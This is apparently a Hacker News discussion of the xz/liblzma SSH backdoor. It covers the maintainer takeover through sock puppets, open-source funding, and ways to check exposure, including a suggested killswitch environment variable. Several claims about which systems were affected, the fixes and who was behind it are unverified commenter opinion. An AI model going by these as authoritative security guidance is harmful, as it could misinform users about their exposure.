What if the developer passed away? It is also easy to blame the developer with mental issues otherwise.
I imagine such actors are embed within major consumer tech teams, too: Twitter, TikTok, Chrome, Snap, WhatsApp, Instagram... covers ~70% of all humanity.
This could be something that agent that infiltrated into companies could use to execute stuff on internal hosts that they have SSH connectivity to but no access.
You could get into bastion hosts and then to PROD and leave no log traces.
That's what this feels like. That, or someone who wanted to sell this to one. Can't imagine the ABC's are sleeping on this one at this point.
Unpopular opinion, but I cannot but admire the whole operation. Condemn it of course, but still admire it. It was a piece of art! From conception to execution, masterful! We got extremely lucky that it was caught so early.
I agree, but the social engineering parts do feel particularly cruel
I felt really bad for the original maintainer getting dog-piled by people who berated him for not doing his (unpaid) job and basically just bring shame and discredit to himself and the community. Definitely cruel.
Though… do we know that the maintainer at that point was the same individual as the one who started the project? Goes deep, man.
Even if it's not his fault the maintainer at this point won't be trusted at all. I feel for him, I think even finding a job at this moment for him would be impossible. Why would you hire someone that could be suspected for that?
This could've happened to anybody, frankly. The attacker was advanced and persistent. I cannot help but feel sympathetic for the original maintainer here.
From TFA's profile:
https://bsky.app/profile/filippo.abyssdomain.expert/post/3ko...
This is a profound realization, isn't it? How much more paranoid should/will maintainers be going forward?
No. From what I've read on the openwall and lkml mailing lists (so generally people who know a lot more about these things than I do), nobody accused Lasse Collins, the original maintainer, of being involved in this, at all, and there wasn't any notion of him becoming untrustworthy.
Its possible the adversary was behind or at least encouraged the dog piling who berated him. Probably a normal basic tactic from a funded evil team playbook.
Might be worth reviewing those who berated him to see if they resolve to real people, to see how deep this operation goes.
This has been investigated and the conclusion is IMO clear: the dogpilling accounts were part of the operation. See the parts about Jigar Kumar in this link: https://boehs.org/node/everything-i-know-about-the-xz-backdo...
One of them who left only one comment does, the rest are sock puppets.
If the payload didn't have a random .5 second hang during SSH login, it would probably not have been found for a long time.
The next time, the attackers probably manage to build a payload that doesn't cause weird latency spikes on operations that people wait on.
(For some reason this brings to mind how Kim Dotcom figured out he was the target of an illegal wiretap... because he suddenly had a much higher ping in MW3. When he troubleshooted, he found out that all his packets specifically got routed a very long physical distance through a GCSB office. GCSB has no mandate to wiretap permanent NZ residents. He ended up getting a personal apology from the NZ Prime Minister.)
I'm a little out of touch, but for over a decade I'd say half the boxes I touched either didn't have enough entropy or were trying to do rDNS for (internal) ranges to servers that didn't host it and is nearly always hand waved away by the team running it as NFN.
That is to say, a half-second pause during the ssh login is absolutely the _least_ suspicious place place for it to happen and I'm somewhat amazed anyone thought to go picking at it as quickly as they did.
What led to continuous investigation wasn't just the 500ms pause, but large spikes in CPU activity when sshd was invoked, even without a login attempt.
What lead to it was the fact he was already micro-benchmarking postgresql along with a couple of other bits of fluke. We were all extremely lucky.
If the payload didn't have a random .5 second hang during SSH login, it would probably not have been found for a long time.
Ironic, how an evil actor failed for a lack of premature optimization :D
"After all, He-Who-Must-Not-Be-Merged did great things - terrible, yes, but great."
I think the most ingenious part was picking the right project to infiltrate. Reading "Hans'" IFUNC pull request discussion is heart-wrenching in hindsight, but it really shows why this project was chosen.
I would love to know how many people where behind "Jia" and "Hans" analyzing and strategizing communication and code contributions. Some aspects, like those third tier personas faking pressure on mailing lists, seem a bit carelessly crafted, so I think it's still possible this was done by a sophisticated small team or even single individual. I presume a state actor would have people pumping out and maintaining fake personas all day for these kind of operations. I mean, would have kinda sucked, if someone thought: "Hm. It's a bit odd how rudely these three users are pushing. Who are they anyway? Oh, look they are all created at the same time. Suspicious. Why would anyone fake accounts to push so hard for this specifically? I need to investigate". Compared to the overall effort invested, that's careless, badly planned or underfunded.
Carelessness could arguably a part of operation: testing/probing how thoroughly the community scrutinizes communication from untrusted individuals.
Compared to the overall effort invested, that's careless, badly planned or underfunded.
Not at all. It's a pattern that's very easy to spot while the eyes of the world are looking for it. When it was needed, it worked exactly as it needed to work. Had the backdoor not been discovered, no one would have noticed--just like no one did notice for the past couple of years.
Had anyone noticed at the time, it would have been very easy to just back off and try a different tactic a few months down the line. Once something worked, it would be quick to fade into forgotten history--unlikely to be noticed until, like now, the plan was already discovered.
I bet it’s not that unpopular. It’s a very impressive attack in many ways:
- It’s subtle.
- It was built to over several years.
- If the attacker hadn’t screwed up the with the weird performance hit that triggered investigation (my dramatic theory: the attacker was horrified at the infonuclear bomb they were detonating and deliberately messed up), we likely wouldn’t know about it.
You can detest the end result while appreciating the complexity of the attack.
I don't think "admire" is the right word, but it's a pretty impressive operation.
It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds. Something gotta change in OSS. I think one solution could be in licenses that force companies/business of certain sizes to pay maintenance fees. One idea from the top of my head.
I think one solution could be in licenses that force companies/business of certain sizes to pay maintenance fees. One idea from the top of my head.
Yet people have huge opposition for those licenses. The big scream of "not free anymore" starts and the entity gets cancelled.
I think focusing on big organizations (e.g. above certain revenue/profit should help).
There must be some sweet spot, after all, the organizations that rely on it should want it to be maintained as well.
tragedy of the commons.
If someone else can pay to maintain it, but you get the benefits, then it's the obvious strategy to use.
And also, there's zero evidence that proprietary software won't have these backdoors. In fact, you can't even check them for it!
That's why I think such OSS packages should use licenses that force large companies to pay (moderate) fees for maintenance. I assume such sums of money won't even tickle them.
Imagine 10 large companies, each pay $1000 a month for critical packages they use. For each developer, that's $10,000 they can either use to quit their current job or hire another person to share the burden.
We need to normalize this.
You may as well just slap a "no commercial use" restriction on it. It takes months to go through procurement at the average big company, and still would if the package cost $1. Developers at these companies will find something else without the friction.
Maybe we need a platform to make this easier?
There is already GitHub Sponsors, for example. What we need to change from that?
I’m not an expert on this. if it ticks all the legal and other issues big companies need to deal with in a frictionless manner, then that’s good. If not, maybe a different solution is needed.
Not really. Just make your software AGPLv3. It's literally the most free license GNU and the FSF have ever come up with. It ensures your freedom so hard the corporations cannot tolerate it. Now you have leverage. If the corporations want it so bad, they can have it. They just gotta ask for permission to use it under different terms. Then they gotta pay for it.
https://www.gnu.org/philosophy/selling-exceptions.html
All you have to do is not MIT or BSD license the software. When you do that, you're essentially transferring your intellectual property to the corporations at zero cost. Can't think of a bigger wealth transfer in history. From well meaning individual programmers and straight to the billionaires.
The BSD style openness only makes sense in a world without intellectual property. Until the day copyright is abolished, it's either AGPLv3 or all rights reserved. Nothing else makes sense.
The problem is, there will be almost zero packages that (very few) "corporations want so bad". The only exception might be cloud providers, that want to host your mildly-popular open-source message queue, but, again, if you are Amazon, you'll soon just re-implement that message queue, drop the "original" one, and after a couple of years your mildly-popular project will become not popular at all.
In that case we'll simply end up exactly where we started. There's a twist though. This time around we're not being taken for fools and exploited.
Better to have a completely irrelevant forgotten project than a massively popular one that makes us zero dollars while CEOs make billions off of it.
This post always comes to mind every time this topic comes up:
https://web.archive.org/web/20120620103603/http://zedshaw.co...
I want people to appreciate the work I’ve done and the value of what I’ve made.
Not pass on by waving “sucker” as they drive their fancy cars.
That is a really good post from 15? years ago, and still very relevant to this day.
It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds.
Is it actually insufficient funds or is it burnout?
I'm not sure. I know from working on OSS projects personally that insufficient funds can easily lead to burnout as well. You gotta find other sources of revenue while STILL maintaining your OSS project.
In the case of XZ it was more akin to burnout based on the literature around the time Jia Tan was instated.
same thing; if you have money you can hire people to spread the burden
There's a difference between important and necessary. The package is necessary not important.
The proposed EU Cyber resilience Act positions itself to be a solution. To put it simply, vendors are responsible for vulnerabilities throughout the lifetime of their products, whether that is a firewall or a toaster. Thus, the vendors are incentives to keep OSS secure, whether that means paying maintainers, commissioning code audits or hiring FTEs to contribute.
I have found it irritating how in the community, in recent years, it's popular to say that if a project doesn't have recent commits or releases that something is seriously wrong. This is a toxic attitude. There was nothing wrong with "unmaintained" lzma two years ago. The math of the lzma algorithm doesn't change. The library was "done" and that's ok. The whiny mailing list post from the sock puppet, complaining about the lack of speedy releases, which was little more than ad hominem attacks on the part time maintainer, is all too typical and we shouldn't assume those people are "right" or have any validity to their opinion.
The math of the lzma algorithm doesn't change. The library was "done" and that's ok.
Playing devil's advocate: the math doesn't change, but the environment around it does. Just off the top of my head, we have: the 32-bit to 64-bit transition, the removal of pre-C89 support (https://fedoraproject.org/wiki/Changes/PortingToModernC) which requires an autotools update, the periodic tightening of undefined behaviors, new architectures like RISC-V, the increasing amount of cores and a slowdown in the increase of per-core speed, the periodic release of new and exciting vector instructions, and exotic security features like CHERI which require more care with things like pointer provenance.
the 32-bit to 64-bit transition
Lzma is from 2010. Amd64 became mainstream in the mid 2000s.
removal of pre-C89 support
Ibid. Also, at the library API level, c89 compatible code is still pretty familiar to c99 and later.
new architectures like RISC-V
Shouldn't matter for portable C code?
the increasing amount of cores and a slowdown in the increase of per-core speed,
Iirc parallelism was already a focus of this library in the 2010s, I don't think it really needs a lot of work in that area.
Actually, the new architectures are a big source of concerns. As a maintainer of a large open source project, I often received pull requests for CPU architectures that I never had a chance to touch. Therefore I cannot build the code, cannot run the tests, and do not understand most of the code. C/C++ themselves are portable, but libs like xz needs to beat the other competitors on performance, which means you may need to use model specific SIMD instructions, query CPU cache size and topology, work at very low level. These code are not portable. When people add these code, they often need to add some tests, or disable some existing tests conditionally, or tweak the build scripts. So they are all risks.
No matter how smart you are, you cannot forecast the future. Now many CPUs have a heterogeneous configuration, which means they have big cores and little cores. But do all the cores have the same capabilities? Is possible that a CPU instruction only available on some of the CPU cores? What does it mean for a multithreaded application? Would it be possible that 64-bit CPUs may drop the support for 32-bit at hardware level? Tens years ago you cannot predict what's going to happen today.
Windows has a large compatibility layer, which allows you running old code on the latest hardware and latest Windows. It needs quite a lot efforts. Many applications would crash without the compatibility patches.
I am a former MS employee, I used to read the compatibility patches when I was bored at the office.
Anyway, liblzma does not "need" to outperform any "competition". If someone wants to work on some performance optimization, it's completely fair to fork. Look at how many performance oriented forks there are of libjpeg. The vanilla libjpeg still works.
The vanilla python works fine but conda is definitely more popular among data scientists.
and then that fork becomes more performant or feature rich or secure or (etc), and it becomes preferred over the original code base, and all distributions switch to it, and we're back at square one.
A software project has the features it implements, the capabilities it offers users, and the boundary between itself and the environment in which those features create value for the user by becoming capabilities.
The "accounting" features in the source code may be finished and bug-free, but if the outside world has changed and now the user can't install the software, or it won't run on their system, or it's not compatible with other current software, then the software system doesn't grant the capability "accounting," even though the features are "finished."
Nothing with a boundary is ever finished. Boundaries just keep the outside world from coming in too fast to handle. If you don't maintain them then eventually the system will be overwhelmed and fail, a little at a time, or all at once.
I feel like this narrative is especially untrue for things like lzma where the only dependencies are memory and CPU, and written in a stable language like C. I've had similar experiences porting code for things like image formats, audio codecs, etc. where the interface is basically "decode this buffer into another buffer using math". In most cases you can plop that kind of library right in without any maintenance at all, it might be decades old, and it works. The type of maintenance I would expect for that would be around security holes. Once I patched an old library like that to handle the fact that the register keyword was deprecated.
Smaller boundaries are likelier to need less maintenance, but nothing stands still. The reason you can run an ancient simple binary on newer systems is that someone has deliberately made that possible. People worked to make sure the environment around its boundary would stay the same instead of drifting randomly away with time—usually so doggedly (and thanklessly) that we can argue whether that stability was really a result of maintenance or just a fact of nature.
The reason you can run an ancient simple binary on newer systems is that someone has deliberately made that possible.
I'm not talking about binaries. I'm talking about C sources. I've done the kind of work you're talking about. You're overestimating it.
I must have misread "plop that kind of library" as "plop that kind of binary" about five times. My bad.
C is not stable, CPU microarchitecture versions are coming from time to time. LZMA compression is not far from trivial. the trade-offs made back then might not be the most useful ones now, hence there are usually things that make sense to change even if the background math will be the same forever.
sure, churn and make believe maintenance for the sake of feeling good is harmful. (and that's where the larger community comes in, distributions, power users, etc. we need to help good maintainers, and push back against bad ones. and yes this is - of course - easier said than done.)
Excellent point. I believe that's coming from corporate supply chain attack "response" and their insistence on making hard rules about "currency" and "activity" and "is maintained" pushes this kind of crap.
Attackers know this as well. It doesn't take much to hang around various mailing lists and look for stuff like this: https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.h...
(Random user or sock puppet) Is XZ for Java still maintained?
(Lasse) I haven't lost interest but my ability to care has been fairly limited mostly due to ...
(Lasse) Recently I've worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we'll see. It's also good to keep in mind that this is an unpaid hobby project
With a few years worth of work by a team of 2-3 people: one writes and understand the code, one communicates, a few others pretend to be random users submitting ifunc patches, etc., you can end up controlling the project and signing releases.
7-Zip supports .xz and keeping its developer Igor Pavlov informed about format changes (including new filters) is important too.
I've always found that dev's name to tilt me.
Funnily enough, the Chinese name was no reason to investigate. It was a performance issue.
Also, to the discussion that a distribution was targeted. Jia advocated Fedora to upgrade to 5.6.x. Fedora is the precursor for RHEL.
Together with the backdoor not working when LANG not set (USA).
Those are two details suggesting the target was USA. Though either or both could've been part of the deception.
I mostly agree with you, but I think your argument is wrong. Last month I found a tiny bug in Unix's fgrep program(the bug has no risk). The program implements Aho Corasick algorithm, which hasn't changed much over decades. However, at least when the code was released to 4.4BSD, the bug still existed. It is not much a concern as nowadays most fgrep progroms are just an alias of grep. They do not use the old Unix code anymore. The old Unix code, and much part of FreeBSD, really couldn't meet today's security standard.For example, many text processing programs are vulnerable to DoS attacks when processing well-crafted input strings. I agree with you that in many cases we really don't need to touch the old code. However, it is not just because the algorithm didn't change.
2 popular and well tested rust yaml libraries have recently been marked as unmaintained and people are moving away from them to brand new projects in a rush because warnings went out about it.
There was nothing wrong with "unmaintained" lzma two years ago.
Well, that's not exactly true. The first patch from Jia Tan is a minor documentation fix, and the second is a bugfix which, according to the commit message (by Collin), "breaks the decoder badly". There's a few more patches after that that fix real issues.
Mark Adler's zlib has been around for a lot longer than xz/liblzma, and there's still bugfixes to that, too.
I was just looking at headscale. Last release mid 2023.
I had immediately asked myself: is this even maintained anymore?
I think this is a very valid question to ask.
Is there a git diff which shows this going in?
Apparently it’s not in the original repo, but in a build script in a distribution tar.
They also used social engineering to disable fuzzing which would have caught the discrepancy: https://github.com/google/oss-fuzz/pull/10667
It’s pretty funny how a bunch of people come piling reaction emojis onto the comments in the PR, after it has all become publicly known.
I’m like.. bro, adding reaction emojis after the fact as if that makes any sort of difference to anything.
Feels almost like tampering with evidence at a crime scene
It’s just adding your initials on the tunnel someone famous just died in.
That’s absurd. Elaborate.
That thread has become an online event and obviously lost its original constructive purpose the moment the malicious intent became public. The commenters are not trying to alter history, it's leaving their mark in an historic moment. I mean the "lgtm" aged like milk and the emoji reactions are pretty funny commentary.
Honestly, it's harrasment at this point.
Would it really have caught it?
No
... why?
my understanding is that fuzzing "caught" the issue by crashing with ifunc disabled
but it wouldn't have "caught" the backdoor which uses public key cryptography
Did the artefact produced [0] for fussing even include the backdoored .so? My understanding was that the compromised build-scripts had measures to only run when producing deb/rpms.
https://github.com/google/oss-fuzz/blob/5f70676a6c9050b9cb68...
Is the person Jia who did this PR a malicious actor?
The person who submitted the PR, JiaT75, is.
The person who approved and merged it is not.
Yeah that’s what I am asking. Thanks
Has that person been found yet?
Does this problem require cops, or an airstrike?
I think they added it in parts over the course of a year or two, with each part being plausibly innocent-looking: First some testing infrastructure, some test cases with binary test data to test compression, updates to the build scripts – and then some updates to those existing binary files to put the obfuscated payload in place, modifications to the build scripts to activate it, etc.
Has anyone proposed a name for this exploit yet?
CVE-2024-3094
"Backdoor in upstream xz/liblzma leading to ssh server compromise"[0] isn't bad either.
doordassh :)
ooh I like this one. I'd propose: backdoordassh
But I wonder if they'd run into trademark issues
LZMAO
This should be it.
It's by far the best, because someone is definitely "LMAO".
xzploit
rxzec
Dragon Gate. There’s my contribution.
All Your SSH Are Belong To Us
Jia-had
Pick one: xzdoor, backdoorssh
OpenSSH certs are weird in that they include the signer's public key.
OpenSSH signatures in general contain signer's public key, which I personally think it's not weird but rather cool since it allows verifying the signature without out of the band key delivery (like in OpenPGP). The authentication of the public key is a separate subject but at least some basic checks can be done with an OpenSSH signature only.
cool since it allows verifying the signature without out of the band key delivery
hope you do key selection sanitization instead of the default (nobody does). otherwise you're accepting random keys you have laying around (like github) when logging to secret.example.com
Using an SSH key used with GitHub for other purposes than GitHub is not a good practice (even if it's common).
I’m confused. I make a unique private key for each machine I use. How is using that machine-specific key on multiple hosts insecure?
Your SSH public keys used on GitHub are very publicly exposed.
This information could be used by SSH servers you are connecting to. You might think you are connecting anonymously, while in fact your SSH client is sending your public key which could then be resolved to your GitHub account.
I don't get it. How do you end up with shell access on a machine you don't trust to know your identity?
edit your .ssh/config.
add one Host entry per domain.
on the end of the file add one catch all host rule with IdentityFile /dev/null
otherwise you're sending default key names to all hosts.
...and you are not sending id_rsa.pub to every single place you add a key, like most guides suggests, right? right?
I would be interested in a comprehensive guide on "doing it right", or a link to a guide that suggests the right thing.
What do you mean ?
Lucky the XZ license switched from "Public Domain" to 0BSD in February (just before these 5.6.0 and 5.6.1 releases)!
0BSD has no clauses, but it does have this:
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
Gross negligence and willfull misconduct cannot be waved away like this, in certain legislations, at least.
Yes, but hopefully it does protect Lasse Collin.
From what?
Litigation including criminal prosecution
He had nothing to do with this, no one is going to prosecute him.
Uh what would be his charge? I cannot fathom how and based on what he would be charged. Maybe this is an american thing, but he's not an US citizen to start with
But Public Domain license already prevented that? At least in the most countries. But local laws goes above licenses anyway.
The questions this backdoor raises:
- what other ones exist by this same team or similar teams?
- how many such teams are operating?
- how many such dependencies are vulnerable to such infiltration attacks? what is our industry’s attack surface for such covert operations?
I think making a graph of all major network services (apache httpd, postgres, mysql, nginx, openssh, dropbear ssh, haproxy, varnish, caddy, squid, postfix, etc) and all of their dependencies and all of the committers to all of those dependencies might be the first step in seeing which parts are the most high value and have attracted the least scrutiny.
This can’t be the first time someone attempted this - this is just the first unsuccessful time. (Yes, I know about the attempted/discovered backdoor in the linux kernel - this is remote and is a horse of a different color).
Why did they decide to create a backdoor, instead of using a zeroday like everyone else?
Why did they implement a fully-featured backdoor and attempted to hide the way it is deployed, instead of deploying something innocent-looking that might as well be a bug if detected?
These must have been conscious decisions. The reasons might provide a hint what the goals might have been.
Wild guess, but it could be that whoever was behind this was highly motivated but didn't have the skill required to find zerodays and didn't have the connections required to buy them (and distrusted the come one come all marketplaces I assume must exist).
Ed448 is orders of magnitude better NOBUS than hoping that nobody else stumbles over the zero-day you found.
Presumably because other people can also utilize the “bug” they create intentionally but looking inadvertently. This backdoor however is activated by the private key only the attacker has so it’s airtight.
If they seemingly almost succeeded how many others have already done similar backdoor? Or was this actually just poking on things seeing if it was possible to inject this sort of behaviour?
Also: Why did Debian patch a service that runs as root and accepts connections from the internet to load unnecessary libraries?
There appears to be a string encoded in the binary payload:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01...
Which functions as a killswitch:
https://piaille.fr/@zeno/112185928685603910
If that is indeed the case, one mitigation might be
```
echo "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" | sudo tee -a /etc/environment
```
That's so strange. This reeks of nation state actors, wanting ways to protect their own systems.
This is a good example of bad logic. It doesn't reek of anything except high quality work. You have an unacknowledged assumption that only nation state actors are capable of high quality work. I think that ultimately you want it to be nation state actors and therefore you see something that a nation state actor would do, so you backtrack that it is a nation state actor. So logically your confirmation bias leads you to affirm the consequent.
I only say this because I'm tired of seeing the brazen assertions of how this has to be nation state hackers. It is alluring to have identified a secret underlying common knowledge. Thats why flat-earthers believe theyve uncovered their secret, or chem trail believers have identified that secret, or vaxxers have uncovered the secret which underlies vaccines. But the proof just isn't there. Dont fall into the trap they fell into.
any competent malware dev would have a panic switch...
if you need to test your own malware that you're developing, do you really want to just run it and disrupt your own system?
It's not uncommon to put in a check that allows the malware to run but be a noop.
Make absolutely sure to include `-a` so it doesn't nuke your env file, and generally speaking, one should upgrade to a version without the malicious code and restart, of course.
without the malicious code and restart
i wonder if the malicious code would've installed a more permanent backdoor elsewhere that would remain after a restart.
I recall things like on windows where malware would replace your keyboard drivers or mouse drivers with their own ones that had the malware/virus, so that even if the original malware is removed, the system is never safe again. You'd have to wipe. And this is not even counting any firmware that might've been dropped.
God the amount of damage this would've caused, nightmarish, we are so unbelievably lucky. In a few months it would've been in every deb&rpm distribution. Thank God we found it early!
Found it early?..
I found the backdoor on five of my Vultr servers as well as my MacBook Pro this evening. I certainly didn’t catch it early.
So if that’s the state of it, it could very well be too late for many many companies. Not to mention folks who rely on TOR for their safety - there could be entire chains of backdoored entry, middle and exit nodes exposing vast numbers of TOR users over the past month or so (spies included!).
...maybe list the distros or macOS point releases/paths that you found it on macOS. ;P
Homebrew had updated to the backdoored version, so although it doesn’t appear to trigger on Mac OS, you should update things to ‘upgrade’ From 5.6.1 to 5.4.6.
It was only in rolling release/testing/unstable distributions, a pretty small subset of systems in the grand scheme of things, is why I said that. It was introduced in February 23 release of xz. This could've been years until discovered.
Never use unstable/testing on real servers, that's a bad idea for entirely different reasons.
Which Distro did you use on the affected devices?
Very few if close to zilch companies are using rolling distros in their critical infra.
What I’d like to understand is it’s proven intentional?
My understanding is it was a few added characters in a header file. I can’t tell you the number of times I was tired and clicked an extra key before committing, or my cat walked across the keyboard while I was out of the room.
That level of sophistication is certainly intentional.
That’s not an explanation about exactly how intention was derived.
I suppose I’m asking for the chain of events that led to the conclusion. I see lots of technical hot takes for how something could work, with no validation it does, nor intent behind it.
I’d like to understand what steps we know were taken and how that presents itself.
I think you're probably missing a lot context about the situation. Here's some useful links https://x0f.org/@FreePietje/112187047353892463 also https://gynvael.coldwind.pl/?lang=en&id=782
Appreciate, that’s the context I was looking for
You should read up on the attack. The few characters were part of avoiding a specific case of detection. The back door is very large, is only added during tar build, and happens to only work when a special key is presented.
It was a few added characters in a header file to make it possible to deliver the actual payload: 80+ kilobytes of machine code. There's no way to actually tell, but I'd estimate the malware source code to be O(10000) lines in C.
It's actually pretty sophisticated. You don't accidentally write a in-memory ELF program header parser.
If my server doesn't have any RSA public keys in its authorized_keys, only ed25519 keys; does this backdoor just not work?
It will still work if the connecting client offers a RSA key.
The only real way to be sure it's not on your system is if your liblzma version is strictly less than 5.6.0 (first infected version):
ls -al $(ldd $(which sshd) | grep lzma | awk '{ print $3 }')
Thanks for the reply, I was just curious because `RSA_public_decrypt` threw me off.
FWIW RSA_public_decrypt is an 90s way of saying RSA_signature_validate
This backdoor does not care about any of the authorisation configuration set by the user.
It is executed before that step. So just make sure you are not affected.
It was just that it hooks to `RSA_public_decrypt` which threw me off, I didn't really understand this backdoor much. I only have one Debian sid machine which was vulnerable and accessible via a public IPv4 ssh, I'm not sure if I should just wipe it.
Could the backdoor have targeted Wireguard instead of ssh?
Ssh is shell, whereas wireguard is a vpn.
You will still be vulnerable as you can connect to an ssh server through your wireguard tunnel.
I don't think that's what OP is asking. I think OP is asking if wireguard functions could be hooked in the same way as sshd functions are in this exploit.
Well, yes, I can, but unlike ssh which is open to the world, my VPN is only open to me and the family. It seems like that greatly reduces the potential attack surface.
My first instinct would be no, as wireguard runs in kernel space(if you're using kernel wireguard, not wireguard-go/some other userspace implementation),and couldn't link in liblzma, a userspace component.
Down voted for asking a valid question? Or is every reader of every HN post expected to be an in depth expert in every article posted every minute of every day of the year? What kind of asshole who has earned the right to down vote comments on HN would down vote a legitimate question?
If the RCE is Russian, it could be used a communication kill-switch on the morning of an attack outside Ukraine, similar to the Viasat hack https://en.m.wikipedia.org/wiki/Viasat_hack
Why does it have to be russian? Could be any country, even USA, China. I don't see why this sort of attack is limited to Russia.
Exactly I don't understand the obsession with Russia
Literally just a country with people like you and me.
"Jia Tan" does not sound Russian
https://boehs.org/node/everything-i-know-about-the-xz-backdo...
"Jia Tan" does not sound Russian
It's not a real name.
What about X Æ A-12?
Why does it have to be russian? Could be any country, even USA, China.
Are you sure you are replying to right comment? Because they did not implied it was not other country or actor. It even directly starts with 'IF'.
Currently if you visit the xz repository it is disabled for violating github's TOS.
While it should clearly be disabled, I feel like github should leave the code and history up, while displaying a banner (and disabled any features that could be exploited), so that researchers and others can learn about the exploit.
In more minor situations when a library is hosting malicious code, if I found the repo to be down I might not think anything of it.
xz has its own git mirror where you can see all the commits
Notably only writable by Lasse who I personally believe is a Good Actor here.
I imagine they don’t want automation downloading it.
You can find GitHub events from the repo as a csv here https://github.com/emirkmo/xz-backdoor-github
If you are interested in the source code that is easy to find. This code and git repo are linked all over the world, in many git repos, and the source is bundled many times in releases as well.
I’d like to know what we mortals – those that run Ubuntu LTS on VMs, for instance — need to do, if anything.
Same!
Right now, nothing. The issue didn’t reach mainstream builds except nightly Red Hat and Fedora 41. The xz version affected has already been pulled and won’t be included in any future software versions.
I would, by routine, advise that publicly available boxes are configured to accept connections only from whitelisted sources, doing that at the lowest possible level on the stack. That’s usually how secure environments such as those used in PCI compliant topologies are specified.
My suggestion: Put your SSH behind WireGuard and/or behind a jump host (with only port forwarding allowed, no shell). If you don’t have a separate host, use a Docker container.
If you use a jump host, consider a different OS (e.g., BSD vs Linux). Remember this analogy with slices of Swiss cheese used during the pandemics? If one slice has a hole, the next slice hopefully won’t have a hole on the same position. The more slices you have, the better for you.
Although for remote management, you don’t want to have too many “slices” you have to manage and that can fail.
I am wondering if reinstalling the entire Archlinux installation would be a wise choice.
Arch Linux uses a native/unpatched version of OpenSSH without dependency on libsystemd and thus without dependency on xz-utils, resulting in no exploitable code path. This means that at least the currently talked about vulnerability/exploit via SSH did presumably not work on Arch. Disclaimer: This is my understanding of the currently circulating facts. Additional fallout might be possible, as the reverse engineering of the backdoor is ongoing.
there are other ways for liblzma to get into ssh (via PAM and libselinux)
This is only correct if the sshd backdoor is the only malicious code introduced into the library.
Just to extend the sibling comment with an excerpt of the Arch announce mail regarding the backdoor:
>From the upstream report [1]:
> openssh does not directly use liblzma. However debian and several other
distributions patch openssh to support systemd notification, and libsystemd
does depend on lzma.
Arch does not directly link openssh to liblzma, and thus this attack vector is not possible. You can confirm this by issuing the following command:
```
ldd "$(command -v sshd)"
```
However, out of an abundance of caution, we advise users to remove the malicious code from their system by upgrading either way. This is because other yet-to-be discovered methods to exploit the backdoor could exist.
I'm surprised the attackers used Ed448 instead of Ed25519.
Maybe their organisation has a policy that requires stronger encryption? Possibly because that organisation is also in the business of cracking such encryption...
Is Ed448 stronger than Ed25519?
Quantitatively, yes(2^224 security target vs 2^128 security target respectively wrt. discrete log calculation).
Qualitatively, 2^128 is already computationally infeasible(barring some advance in quantum computing), so the meaningful difference in security is debatable, assuming no weaknesses in the underlying curve.
Maybe they know something we don’t about Ed25519? [Queue X-Files theme tune]
The headline seems like a distinction without a difference. Bypassing ssh auth means getting a root shell. There is no significant difference between that and running system(). At most maybe system() has less logging.
Bypassing ssh auth means getting a root shell
Only if you're allowed to login as root, which is definitely not the case everywhere.
Plus, detection is likely to be be very different.
My sense was this backdoor gets to execute whatever it wants using whatever "user" sshd is running as. So even if root logins are disabled, this backdoor doesn't care.
not only that, but logins show up in logs.
One of the takeaways from this to me is that there is way too much sketchy bullshit happening in critical system software. Prebuilt binary blobs [1]? Rewriting calls to SIMD enhanced versions at runtime [2]? Disabling sanitizers [3]? Incomprehensible build scripts [4]?
All of this was either at least strongly frowned upon, if not outright unacceptable, on every project I've ever worked on, either professionally or for fun. And the stakes were far lower for those projects than critical linux system software.
1. https://lwn.net/Articles/967442/
Prebuilt binary blobs [1]?
My understanding is that the binary blobs were test data. Find a bug that happens on certain input. Craft a payload that both triggers the bug and does the malicious thing you want to do. Add the binary blob to /tests/files/. Then write a legitimate test to ensure that the bug goes away.
Then do some build script bullshit to somehow get that binary into the build.
Rewriting calls to SIMD enhanced versions at runtime?
That's something that's been done for decades. It's pretty normal. What's not normal is for that to get re-done after startup. That is, one library should not be able to get that resolution process to be re-done after it's been done once. Malicious code that knows the run-time linker-loader's data structures could still re-resolve things anyways, which means that even removing this feature altogether from the run-time linker-loader wouldn't prevent this particular aspect of this attack.
I.e., you're barking up the wrong tree with (2).
We should probably look into other fundamental dependencies like xz as well to see if similar practices are happening.
Another good reason to use a firewall with an IP address allowlist for SSH.
And now for my next trick: smuggling a backdoor into iptables.
Ha yes. I rely on cloud-provided security groups for that. So I blindly have to believe my provider is immune to supply chain attacks.
I've seen a lot of discussion on the topic but have yet to see someone just specify which versions of xz are likely affected so that I can verify whether I'm running them or not ..
Ask your distro. On Arch, it's 5.6.0-1 and 5.6.1-1. Most of Debian (outside sid/unstable) is unaffected, as allegedly is Red Hat.
https://archlinux.org/news/the-xz-package-has-been-backdoore...
Apparently the backdoor reverts back to regular operation if the payload is malformed or the signature from the attacker's key doesn't verify.
Does this mean it's possible to send every ssh server on the internet a malformed payload to get it to disable the backdoor if it was vulnerable?
It just reverts it for the specific connection - most likely to not raise suspicions on the fact that SSH doesn't accept RSA keys anymore
I'm assuming nation states and similar actors monitor mailing lists for phrases like "I'm feeling burnt out" or "not enough bandwidth, can you open a PR?"
According to the timeline here, trust was established in "only" a few years. https://boehs.org/node/everything-i-know-about-the-xz-backdo...
So I imagine major actors already have other assets in at-risk open source projects, either for the source code or distro patch/packaging level. Is that too tinfoil hat? I only know enough about secops to be dangerous to myself and everyone around me.
Is that too tinfoil hat?
Not at all, no. This is probably happening way more than just this instance, unfortunately.
If I'm reading this right, would there be any persistent evidence of the executed payload? I can't think of a reason anything would have to go to disk in this situation, so a compromise could easily look like an Auth failure in the logs .... maybe a difference in timings .. but that's about it ...
Unless the payload did something that produced evidence, or if the program using openssl that was affected was, for some reason, having all of its actions logged, then no, probably not.
